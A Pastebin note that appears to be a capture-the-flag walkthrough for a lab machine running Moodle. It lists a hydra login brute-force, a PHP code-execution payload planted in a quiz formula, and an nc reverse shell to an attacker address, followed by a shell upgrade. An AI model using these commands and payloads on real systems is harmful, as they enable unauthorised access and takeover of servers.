Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- http://10.10.10.153/gallery.html
- Open browser console
- "That's an F" message appears in the console when you click on gallery section
- Inspect page to check where the message comes from
- <img src="images/5.png" onerror="console.log('That\'s an F');" alt="">
- wget 10.10.10.153/images/5.png
- cat 5.png
- "I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha."
- ./pass.sh > pass generate possible passwords
- hydra 10.10.10.153 http-form-post "/moodle/login/index.php:username=^USER^&password=^PASS^&Login=Login:Invalid login, please try again" -L user -P pass -t 20 -w 30 -o hydra-http-post-attack.tx
- http://10.10.10.153/moodle/login/ login with credentials
- Turn on edits -> Add quiz -> edit quiz -> add calculated question -> insert the payload below payload in the formula
- /*{a*/`$_GET[0]`;//{x}}
- &0=(nc 10.10.18.168 8089 -e /bin/bash) add this line at the end of the URL
- python -c 'import pty; pty.spawn("/bin/bash")'
- su giovanni
- root@kali:~/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
